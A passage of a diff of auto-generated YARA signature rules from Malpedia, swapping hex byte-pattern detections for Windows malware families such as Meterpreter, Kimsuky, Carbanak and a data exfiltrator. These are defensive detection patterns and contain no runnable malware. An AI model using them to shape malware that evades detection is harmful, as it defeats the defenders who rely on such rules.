891c24 89442404 0fb7c7 } condition: - 7 of them and filesize <1400832 + 7 of them and filesize <360448 } -rule MALPEDIA_Win_Sombrat_Auto : FILE +rule MALPEDIA_Win_Meterpreter_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "829e34aa-1da2-5a33-9238-c1cc0c096058" + id = "94296578-89d7-5d7b-b7e4-efe037d64332" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sombrat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sombrat_auto.yar#L1-L149" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.meterpreter" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.meterpreter_auto.yar#L1-L125" license_url = "N/A" - logic_hash = "a1432e014afc208b0318e2ead477453bc5bd4bddb98bd4c2d60380403a2290c4" + logic_hash = "71f865d4008295f79c7afc49beb427fb0376821d7b27897466868baff3347cd2" score = 75 quality = 75 tags = "FILE" @@ -151130,38 +153942,32 @@ rule MALPEDIA_Win_Sombrat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 014114 8b7508 837df800 8b5df4 } - $sequence_1 = { 01041e 8b4508 42 8d7308 } - $sequence_2 = { 0144244a 894e0c ffb72c010000 ff15???????? } - $sequence_3 = { 01420c 8b11 294210 8b09 } - $sequence_4 = { 0145e4 8b55f8 83c40c 294644 } - $sequence_5 = { 0000 e8???????? c70424???????? 8d5f0c 68???????? } - $sequence_6 = { 7514 8b4610 8d8de4fffeff 2b4618 03c3 } - $sequence_7 = { 014114 014620 f6460c04 8945e0 742d } - $sequence_8 = { 015f08 33c0 488b4c2470 4833cc } - $sequence_9 = { 0145f1 4533c9 4533c0 488b16 } - $sequence_10 = { 016b08 488d05dc980500 41b9e7160000 4889442420 } - $sequence_11 = { 015f08 83bfd800000016 0f856c020000 488b87c8000000 } - $sequence_12 = { 016b08 33c0 e9???????? 33ff } - $sequence_13 = { 01448c20 48ffc1 493bc9 7cf1 } - $sequence_14 = { 015f08 33c0 e9???????? 488b4760 } - $sequence_15 = { 015f08 488bcf e8???????? 8bf0 } + $sequence_0 = { 55 8bec dcec 088b55895356 108b3a85ff89 7dfc 750e } + $sequence_1 = { fc b8c0150000 8b7508 33e5 257e040275 238b1d6a016a 006a00 } + $sequence_2 = { f1 57 52 bc40e84fff 38ff 83db14 5f } + $sequence_3 = { 314319 034319 83ebfc 0acb } + $sequence_4 = { 0000 68ffff0000 52 ffd7 8b2410 } + $sequence_5 = { 8be5 5d c27f00 8d4df4 8d55ec } + $sequence_6 = { 51 6a00 6a00 37 0052bf 15???????? 85c0 } + $sequence_7 = { 8b451c 8d07 a4 52 8d4d18 50 } + $sequence_8 = { 41 00ff 15???????? 33c0 c3 7790 55 } + $sequence_9 = { 83ec08 53 8b4708 57 33ff 85db } condition: - 7 of them and filesize <1466368 + 7 of them and filesize <188416 } -rule MALPEDIA_Win_Sunorcal_Auto : FILE +rule MALPEDIA_Win_Lowball_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "8d478635-7b1a-5ec4-85a6-3854fefcfed4" + id = "5424f572-46b4-58bc-b4a0-f5f116f9edc3" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sunorcal" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sunorcal_auto.yar#L1-L125" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lowball" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lowball_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "58249461fa7cf2580b3033b5e590d54e14d2db390f8c7cf00dbe39cb0b927df2" + logic_hash = "40672e1fab5ab37bc1a93541afc7340032670ae9b7325b888c89c49deec74a07" score = 75 quality = 75 tags = "FILE" @@ -151175,32 +153981,32 @@ rule MALPEDIA_Win_Sunorcal_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6a03 e8???????? cc 55 8bec 83ec0c a1???????? } - $sequence_1 = { c21000 8b442404 8b00 813863736de0 752a 83781003 7524 } - $sequence_2 = { 5e 5b c21000 8b442404 8b00 813863736de0 752a } - $sequence_3 = { ff15???????? 33c0 c3 c3 55 8bec } - $sequence_4 = { 7c02 eb0e e8???????? e8???????? 85c0 } - $sequence_5 = { 5b c21000 8b442404 8b00 813863736de0 } - $sequence_6 = { 68b7000000 ff15???????? 6a64 68???????? } - $sequence_7 = { 5b c21000 8b442404 8b00 813863736de0 752a 83781003 } - $sequence_8 = { ff15???????? 68b7000000 ff15???????? 6a64 68???????? 6a67 } - $sequence_9 = { 68???????? ff15???????? 33c0 c3 c3 55 8bec } + $sequence_0 = { 0f8436010000 8b942430060000 33c9 85d2 740c 8bfa } + $sequence_1 = { ff54242c 5f 5e 5d 33c0 } + $sequence_2 = { 8d4f01 51 e8???????? 56 8bd8 ff15???????? } + $sequence_3 = { 68???????? f3a4 6a00 ff54242c 6810270000 ff15???????? bf???????? } + $sequence_4 = { 85ff 897c240c 0f848c000000 8b942420020000 55 } + $sequence_5 = { c1e902 f3a5 8bcb 8d84244c0d0000 83e103 50 } + $sequence_6 = { 83c410 85c0 752d 68b80b0000 ffd3 8d8c24400a0000 8d94241c010000 } + $sequence_7 = { 8bc1 8bf7 8bfa 8d942434070000 c1e902 f3a5 8bc8 } + $sequence_8 = { ff15???????? 83c404 89442410 b905000000 be???????? } + $sequence_9 = { 6a00 6a00 68bb010000 51 56 } condition: - 7 of them and filesize <172032 + 7 of them and filesize <40960 } -rule MALPEDIA_Win_Dispcashbr_Auto : FILE +rule MALPEDIA_Win_Kgh_Spy_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "02a73395-ac12-50d4-b2ec-e868c4b1a459" + id = "95e1000f-6599-59f6-ad77-7fb1f63fc7e2" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dispcashbr" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dispcashbr_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kgh_spy" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.kgh_spy_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "60c8be22bea8462dd56c514e62576b626445f5aa18aea505cf9cb5c5983fb848" + logic_hash = "c99afdfd1b207e301e0a54b515065ba98af784202a9cd5e6f9a55bcba5a38dab" score = 75 quality = 75 tags = "FILE" @@ -151214,34 +154020,34 @@ rule MALPEDIA_Win_Dispcashbr_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 83ec08 c7442408ceffffff c7442404???????? } - $sequence_1 = { e8???????? 83ec08 c7442408eaffffff c7442404???????? } - $sequence_2 = { e8???????? 83ec08 c7442408ceffffff c7442404???????? a1???????? 83c020 } - $sequence_3 = { a1???????? 83c020 890424 e8???????? eb45 c70424f5ffffff e8???????? } - $sequence_4 = { 83ec08 c7442408f2ffffff c7442404???????? a1???????? 83c020 890424 e8???????? } - $sequence_5 = { 83ec08 c7442408d9ffffff c7442404???????? a1???????? 83c020 890424 } - $sequence_6 = { 890424 e8???????? 83ec08 c7442408d7ffffff } - $sequence_7 = { 890424 e8???????? 83ec08 c7442408c9ffffff c7442404???????? } - $sequence_8 = { 83ec04 c744240404000000 890424 e8???????? 83ec08 c7442408f2ffffff c7442404???????? } - $sequence_9 = { c70424f5ffffff e8???????? 83ec04 c744240404000000 } + $sequence_0 = { 488b442428 8b4c2430 894808 e9???????? 4883c458 5f } + $sequence_1 = { 75e2 488b842498000000 89442460 8b442468 8b4c2460 488b542470 4803d1 } + $sequence_2 = { 488d8c24b0000000 ff15???????? 85c0 0f8547010000 0fb705???????? } + $sequence_3 = { 488d8424300a0000 4889842488000000 48c7442450ffffffff 48ff442450 } + $sequence_4 = { 488b4c2468 803c0800 75e8 488b442468 488d8c24c0000000 48898c2498000000 48c7442470ffffffff } + $sequence_5 = { f3aa 488d4c2428 ff15???????? 0fb7442428 83f809 740a 0fb7442428 } + $sequence_6 = { 488d8424f0030000 488bf8 33c0 b908020000 f3aa 4c8d0df7e30000 } + $sequence_7 = { 4885c0 7403 f0ff00 488d4128 41b806000000 488d15b4a30000 483950f0 } + $sequence_8 = { 8bc8 e8???????? 48898424d8000000 48c744242000000000 4c8d8c2470010000 448b442468 } + $sequence_9 = { 488d1dddab0000 483bcb 740c e8???????? } condition: - 7 of them and filesize <123904 + 7 of them and filesize <207872 } -rule MALPEDIA_Win_Glasses_Auto : FILE +rule MALPEDIA_Win_Kimsuky_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "c6da4c93-ee41-5868-bb14-5b5963376366" + id = "161d56f8-b6bc-5eb6-924b-1d343e294025" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.glasses" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.glasses_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kimsuky" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.kimsuky_auto.yar#L1-L285" license_url = "N/A" - logic_hash = "6195d6cdd9cb4570720f28f4358090026d5f6751f78a62fc950fb9d18ef5a646" + logic_hash = "9e58434bf421de4759f7d578f12345202af7c8ac65503745224655e4e4de3bf9" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -151253,32 +154059,53 @@ rule MALPEDIA_Win_Glasses_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 8bf0 83c40c 3bf3 0f85e8fdffff 8d4590 50 } - $sequence_1 = { e8???????? 8d852cfbffff 50 6a00 6a50 68???????? 8d8de4faffff } - $sequence_2 = { e8???????? 83bdd8fdffff00 0f849e000000 8bcb e8???????? 85c0 740d } - $sequence_3 = { e9???????? 8d8d38f9ffff e9???????? 8d8dfcf8ffff e9???????? 8d8dacf8ffff e9???????? } - $sequence_4 = { 8bf1 8975f0 c706???????? 8d8e84000000 c745fc01000000 c7460800000000 e8???????? } - $sequence_5 = { e8???????? 83b94814000002 0f8d54ffffff ff894c140000 8b814c140000 8b91580b0000 899481540b0000 } - $sequence_6 = { ff0d???????? 53 8bcf e8???????? c645ff00 5f 5e } - $sequence_7 = { ffd2 84c0 0f840b010000 8d4da4 e8???????? 8bf8 8b45cc } - $sequence_8 = { eb10 8bce e8???????? 8b5d18 8945e8 895dec 8b7510 } - $sequence_9 = { e8???????? 899e7c070000 e9???????? 83f801 7524 6a02 e8???????? } + $sequence_0 = { 50 ffd6 8bd8 85db 7510 5e } + $sequence_1 = { 6a00 6800f70484 6a00 6a00 68???????? 8d85e4fbffff 50 } + $sequence_2 = { 8d85ecfbffff 50 8d85f8feffff 50 8d85f4fdffff } + $sequence_3 = { ffd7 a3???????? 8d85ccf3ffff 50 56 ffd7 } + $sequence_4 = { 7503 56 eb18 6a00 6a00 6a00 } + $sequence_5 = { 85c0 7423 6a00 8d85f0feffff 50 68???????? } + $sequence_6 = { b9???????? e8???????? 8d85f8feffff 50 6a00 6a00 6a1a } + $sequence_7 = { eb06 ff15???????? 85c0 7421 } + $sequence_8 = { ff15???????? 85c0 7516 ff15???????? 8bd8 e8???????? } + $sequence_9 = { 4156 4157 4883ec40 48896c2470 4889742438 4533ff 4c89642428 } + $sequence_10 = { ebdb 65488b042560000000 48897c2430 48896c2460 } + $sequence_11 = { 0f857affffff 4c8b7c2460 4c8b6c2420 4c8b642428 488b7c2430 488b742438 488b6c2470 } + $sequence_12 = { 498bce 418d5001 ffd3 488bc3 4883c440 415f } + $sequence_13 = { 488b742438 488b6c2470 4d8bc6 4d2b4730 } + $sequence_14 = { 0f8540feffff 488b6c2460 4c637d3c 33c9 41b800300000 4c03fd } + $sequence_15 = { 4533ff 4c89642428 4c896c2420 33f6 4533ed 4533e4 } + $sequence_16 = { 85c0 0f94c1 85c9 0f8494020000 } + $sequence_17 = { 4c89642430 c744242880000000 c744242002000000 4533c9 4533c0 } + $sequence_18 = { 85c0 0f8432020000 8b7590 660f1f440000 } + $sequence_19 = { 8b9590000000 0395d8000000 0395b8000000 8bbda0010000 8d4702 03c2 89442450 } + $sequence_20 = { 8b4c2468 c6043900 803f00 740d } + $sequence_21 = { 488d8a38000000 e9???????? 488d8a28010000 e9???????? } + $sequence_22 = { 85c0 7464 c7453038000000 33c0 } + $sequence_23 = { 85c0 7471 895c2468 8d4801 } + $sequence_24 = { 83f809 8d7340 7405 be20000000 c68424a000000000 } + $sequence_25 = { 668945c4 8b05???????? 8945d8 0fb705???????? } + $sequence_26 = { 668945ea 6644896dec 4c8d45c0 488d1563c20400 } + $sequence_27 = { 66894507 884509 895d0b 85ff } + $sequence_28 = { 668945dc 448d62ff e8???????? 33db } + $sequence_29 = { 668945b0 488d4db0 e8???????? 488d442450 } + $sequence_30 = { 668945e8 488bc3 7203 488b03 } condition: - 7 of them and filesize <4177920 + 7 of them and filesize <1021952 } -rule MALPEDIA_Win_Noxplayer_Auto : FILE +rule MALPEDIA_Win_Darktequila_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "aeae21d3-7da2-50ec-a0e6-bf9f936a4ea7" + id = "24336c6c-1ca4-5e88-a6d8-a7828b6362d5" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.noxplayer" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.noxplayer_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darktequila" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.darktequila_auto.yar#L1-L116" license_url = "N/A" - logic_hash = "1a7d1e8968616ef04ac90265f765d718da000484253d6b729f0bd247a60f8bd7" + logic_hash = "cfa088d1d1871ddb38182a8cfb5b3421267e6793e63357e090f59bf6001f73cc" score = 75 quality = 75 tags = "FILE" @@ -151292,32 +154119,32 @@ rule MALPEDIA_Win_Noxplayer_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 488941b0 488b42b8 41b8a8000000 488941b8 488b42c0 488941c0 8b42c8 } - $sequence_1 = { 413bd0 7511 48ffc1 4883c004 4883f904 7ce7 32c0 } - $sequence_2 = { 4803c1 48898398000000 488b4350 488b4818 48898bb0000000 0f28742470 440f28442460 } - $sequence_3 = { e8???????? 488d542450 b904010000 ff15???????? 4c8d05403b0300 488d4c2450 ba04010000 } - $sequence_4 = { 4c8d4e34 4c8b442458 488bd6 488b4e58 e8???????? 488d5614 488b4e50 } - $sequence_5 = { 488d5557 498d4c2408 e8???????? 488bd8 488d45b7 483bd8 7422 } - $sequence_6 = { 488bf2 488bf9 488d91c0000000 488d4c2428 e8???????? 90 488dafa0000000 } - $sequence_7 = { 4c894c2470 488b4508 4c3bc8 740f 418b4918 390e 7c07 } - $sequence_8 = { 8d4801 488d93b8000000 8b02 3bc8 741b 8b83c0000000 488b8b88000000 } - $sequence_9 = { 4489642460 4c8d442458 488d542460 488bc8 e8???????? eb03 498bc5 } + $sequence_0 = { c3 85c9 7414 8b5b10 85c0 } + $sequence_1 = { 85c0 740d 894610 b801000000 897e04 } + $sequence_2 = { 8b45fc 50 ff15???????? 8b0d???????? 8b5508 } + $sequence_3 = { e8???????? 83c410 897b08 5f } + $sequence_4 = { 8bd3 e8???????? 8b4310 56 } + $sequence_5 = { 740d 894610 b801000000 897e04 5b } + $sequence_6 = { 72dc b8???????? c3 33d2 3915???????? 0f857c000000 } + $sequence_7 = { 8945f8 85c0 7467 8b4b0c 8b5310 894df4 } + $sequence_8 = { 83c410 897b08 5f b801000000 5e } + $sequence_9 = { c705????????02000000 8b45fc 50 ff15???????? 8b0d???????? 8b5508 a1???????? } condition: - 7 of them and filesize <742400 + 7 of them and filesize <1827840 } -rule MALPEDIA_Win_Molerat_Loader_Auto : FILE +rule MALPEDIA_Win_Cameleon_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "6649c702-0322-5056-bfb1-5bb59b0b659a" + id = "65617330-75c8-57cf-8907-1895d87814f0" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.molerat_loader" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.molerat_loader_auto.yar#L1-L132" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cameleon_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "9e4d3c42bd1eb8db57dd9c545f5a5ad86009e39e60f601bd2428ef16d555d86e" + logic_hash = "1c72ed0d3ea99fe45b9cdedee31a0c82e32752220a6d117c9414b55a84125b1d" score = 75 quality = 75 tags = "FILE" @@ -151331,32 +154158,32 @@ rule MALPEDIA_Win_Molerat_Loader_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83c40c 68???????? 50 8d8dc0fdffff 51 c645fc18 } - $sequence_1 = { 68???????? e8???????? 8b4d58 e8???????? e9???????? 68???????? e8???????? } - $sequence_2 = { 7d0d 8a4c181c 888860464400 40 ebe9 33c0 8945e4 } - $sequence_3 = { 83c40c 8d957cffffff 52 50 8d85d0fdffff 50 c645fc3a } - $sequence_4 = { 50 8b4204 ffd0 8d4d0c e8???????? 8d8da0fdffff c645fc07 } - $sequence_5 = { 7f0a 8b08 8b11 50 8b4204 ffd0 c645fc69 } - $sequence_6 = { 8b95ecfeffff 8995e8feffff c745fc01000000 b8???????? c3 c645fc00 } - $sequence_7 = { 8d4c247c c68424d800000002 e8???????? 8d54247c 52 c7842480000000e8c64300 e8???????? } - $sequence_8 = { 83c010 83c404 8945e8 68???????? 68???????? 8d4de4 51 } - $sequence_9 = { 8d8d74ffffff c645fc03 e8???????? 8d8574ffffff 50 8d4d5c 68???????? } + $sequence_0 = { 53 56 57 8bf9 897df0 c745ec00000000 8b07 } + $sequence_1 = { 8a80f8c70410 8807 47 46 8bcb c6458301 e8???????? } + $sequence_2 = { 83ec18 8bd4 8965ec c7421000000000 c7421400000000 } + $sequence_3 = { 8d7dd0 837de408 0f437dd0 83ec18 8bd4 c7421000000000 c7421400000000 } + $sequence_4 = { 48 a3???????? ff15???????? 8b0d???????? 89048d98ce0510 5d c3 } + $sequence_5 = { 247f 88441628 eb12 0c80 88441628 8b0cbd50d60510 c644112900 } + $sequence_6 = { b83b000000 663bc8 0f94c0 84c0 7431 } + $sequence_7 = { 8d55dc c645fc02 8d8d24ffffff e8???????? 8bc8 8b01 } + $sequence_8 = { 8bd9 56 57 837b3800 0f848c010000 807b3d00 0f8482010000 } + $sequence_9 = { 5d c20400 85ff 75d4 897e10 837e1408 720f } condition: - 7 of them and filesize <688128 + 7 of them and filesize <824320 } -rule MALPEDIA_Win_Rofin_Auto : FILE +rule MALPEDIA_Win_Sedll_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "1b07367d-380d-5a5b-bc33-dfe76ecfb58c" + id = "009a21d7-9a67-5650-8e55-9cfcfc21e0f2" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rofin" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rofin_auto.yar#L1-L128" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sedll" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sedll_auto.yar#L1-L117" license_url = "N/A" - logic_hash = "8597563e9ea27355f4e9d99fcf2f4a72dc9ad41d82ef13adb90824429264b4c0" + logic_hash = "21c4f01124bd0cd6ba61129966ab2fcf5cc6cd643797282b60948edf1b57805e" score = 75 quality = 75 tags = "FILE" @@ -151370,32 +154197,32 @@ rule MALPEDIA_Win_Rofin_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 014df0 3b06 72b5 eb1a 8b45fc 69c01c010000 03c6 } - $sequence_1 = { 84c0 c706???????? 7417 8b4604 85c0 7410 } - $sequence_2 = { 8d442434 53 50 33d2 668b95d0030000 56 8d4c242c } - $sequence_3 = { c644244163 88542442 c644244528 885c2446 c64424473e c644244800 } - $sequence_4 = { 8b44240c 8b542404 83ec10 8d4c2400 53 50 } - $sequence_5 = { 83c408 3bf3 7420 8b4c2420 56 8b513c 52 } - $sequence_6 = { 72b5 eb1a 8b45fc 69c01c010000 03c6 81781000d00000 7506 } - $sequence_7 = { f3a4 8d4c246a 6800040000 51 6a00 ff15???????? } - $sequence_8 = { e8???????? eb73 bf???????? 83c9ff 33c0 f2ae f7d1 } - $sequence_9 = { 8b45fc 83481c10 8b45fc 89585c 8d45f4 } + $sequence_0 = { 6a00 6a00 6a00 8d8424b0030000 } + $sequence_1 = { 50 ff15???????? 8b4df8 85c9 7407 } + $sequence_2 = { 74e3 57 33c9 33ff 85db 0f848f000000 } + $sequence_3 = { 56 6800010000 8d85f0feffff 8bf1 6880000000 50 } + $sequence_4 = { 8d842484010000 50 8d842498030000 50 ff15???????? } + $sequence_5 = { 6a00 53 e8???????? 83c410 6a00 6a00 ff75f4 } + $sequence_6 = { ff15???????? 85c0 7523 85ff } + $sequence_7 = { 57 6aff ff75fc 6a00 6a00 ffd3 8bc7 } + $sequence_8 = { 8b4514 8908 a1???????? 50 } + $sequence_9 = { 7604 8bf8 2bfb 8d7701 56 } condition: - 7 of them and filesize <409600 + 7 of them and filesize <65536 } -rule MALPEDIA_Win_Hyperbro_Auto : FILE +rule MALPEDIA_Win_Tinytyphon_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "3941e796-a485-533f-bda6-3b99f666d1b3" + id = "7815c923-a900-5d01-9a5b-05c1d0e30118" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hyperbro" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hyperbro_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinytyphon" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.tinytyphon_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "4bee21ef51c3ea4f0bd6259a2f8a9c95c3e4ba56a999c789fc7f134934b59561" + logic_hash = "e057b3aaf1408e310c88894f8b7bb86876f0ba7268b4daf2dcf5c0bb823f13c5" score = 75 quality = 75 tags = "FILE" @@ -151409,32 +154236,32 @@ rule MALPEDIA_Win_Hyperbro_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 33c0 6a40 66890479 e8???????? 6a40 } - $sequence_1 = { 8b4604 83c004 50 6a00 57 } - $sequence_2 = { 46 47 83e801 75f5 } - $sequence_3 = { 8d542428 68???????? c74424200c000000 c744242801000000 89542424 ff15???????? } - $sequence_4 = { 05ff000000 41 3d01feffff 0f871c010000 8bd5 2bd1 83fa01 } - $sequence_5 = { 50 8d4c2472 51 6689442474 } - $sequence_6 = { 6882000000 c706???????? e8???????? 6882000000 6a00 50 } - $sequence_7 = { e8???????? 83c404 83eb01 79ec 8b4f2c 51 e8???????? } - $sequence_8 = { 83c410 85ed 750e 8b7c2410 } - $sequence_9 = { 8b44242c 3bc3 7415 50 e8???????? 83c404 } + $sequence_0 = { c745b430144000 c745b834144000 c745bc38144000 c745c03c144000 c745c440144000 } + $sequence_1 = { 50 8b0d???????? 51 e8???????? 83c420 8b955cffffff 52 } + $sequence_2 = { 68???????? 8d85e8feffff 50 ff15???????? 8d8dccfdffff 51 } + $sequence_3 = { 034df4 034df0 894dd4 8b5508 } + $sequence_4 = { 034df8 0fbe11 85d2 0f84fe010000 8b4508 0345f8 } + $sequence_5 = { 0345c0 8a08 880a ebdf 8d55d8 52 } + $sequence_6 = { eba9 68a01f0000 ff15???????? 6a0f 8d8df0feffff 51 } + $sequence_7 = { 034a58 8b45f8 8d8c0878a46ad7 894df8 8b55f8 c1e207 8b45f8 } + $sequence_8 = { 83bde4feffffff 750a c785e4feffff00000000 83bde4feffff00 7505 } + $sequence_9 = { 52 8d85f0feffff 50 8d8dd0fdffff } condition: - 7 of them and filesize <352256 + 7 of them and filesize <90112 } -rule MALPEDIA_Win_Carbanak_Auto : FILE +rule MALPEDIA_Win_Logtu_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "c07fe935-504c-5c98-a746-fcd9d2cd2656" + id = "c67bd86c-2bf9-53d0-9e56-6b46a7295f73" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.carbanak" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.carbanak_auto.yar#L1-L108" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.logtu" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.logtu_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "71119e0e8f2ea511e845d7f70364c6b521841c48aa27c3226400782c05c0bf22" + logic_hash = "a1a55d055cae44fc8e92b272f8aaf6bf080cbc3cc39bc731b57992d62cbc8c84" score = 75 quality = 75 tags = "FILE" @@ -151448,32 +154275,32 @@ rule MALPEDIA_Win_Carbanak_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7f05 83c061 eb03 83c027 } - $sequence_1 = { 7907 32c0 e9???????? 7507 b001 } - $sequence_2 = { 32c0 e9???????? 7507 b001 } - $sequence_3 = { 2bd1 81e921100000 8bc1 c1f80e 0cc0 } - $sequence_4 = { 8b4608 eb02 8bc3 85c0 } - $sequence_5 = { c3 8d4120 3c1f 7705 0fb6c1 } - $sequence_6 = { 7c0d e8???????? 84c0 7504 } - $sequence_7 = { 7c0d e8???????? 84c0 7504 33c0 } - $sequence_8 = { e9???????? 3d2c5c0700 750a e8???????? } - $sequence_9 = { 3d2c5c0700 750a e8???????? e9???????? } + $sequence_0 = { 8bf0 8d85a4fdffff 68???????? 50 ff15???????? } + $sequence_1 = { ff15???????? 8d8534ffffff 50 ff15???????? 6a01 } + $sequence_2 = { 50 6a64 6a00 ff15???????? 85c0 7509 8b45bc } + $sequence_3 = { 8bec 81ec98050000 a1???????? 33c5 8945fc 53 } + $sequence_4 = { 55 8bec 81ec98050000 a1???????? 33c5 8945fc 53 } + $sequence_5 = { 8d8574faffff 50 8d8534ffffff 50 } + $sequence_6 = { 50 8d85fcf7ffff 68???????? 50 e8???????? 8d85fcf7ffff 6800040000 } + $sequence_7 = { 6a01 8bf0 8d85a4fdffff 68???????? } + $sequence_8 = { 8d8584faffff 50 8d8574faffff 50 8d8534ffffff } + $sequence_9 = { 8d8578faffff 50 8d8584faffff 50 } condition: - 7 of them and filesize <658432 + 7 of them and filesize <924672 } -rule MALPEDIA_Win_Data_Exfiltrator_Auto : FILE +rule MALPEDIA_Win_Adylkuzz_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a4e15d5b-f5a8-5629-8aa0-4b08d538c94b" + id = "092d1cf3-18b6-52f1-b243-99d6007e2b3c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.data_exfiltrator" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.data_exfiltrator_auto.yar#L1-L121" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.adylkuzz" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.adylkuzz_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "3310f9551fc82e6e58581f9d53ef710d168d316a9e233b611258320515dc0adb" + logic_hash = "de89fec9458f93b8b7ae503a1f8b6b5fd97e3b1bb1f58b10dd0b4e8fc16d178d" score = 75 quality = 75 tags = "FILE" @@ -151487,34 +154314,34 @@ rule MALPEDIA_Win_Data_Exfiltrator_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 488b4c2440 ff15???????? 4889442420 488b542448 } - $sequence_1 = { e8???????? 4c8b442428 488d152c570000 488b4c2420 e8???????? 41b80a000000 } - $sequence_2 = { 488d8c24a0000000 e8???????? 488d9424a0000000 488b8c2430010000 e8???????? 488905???????? } - $sequence_3 = { 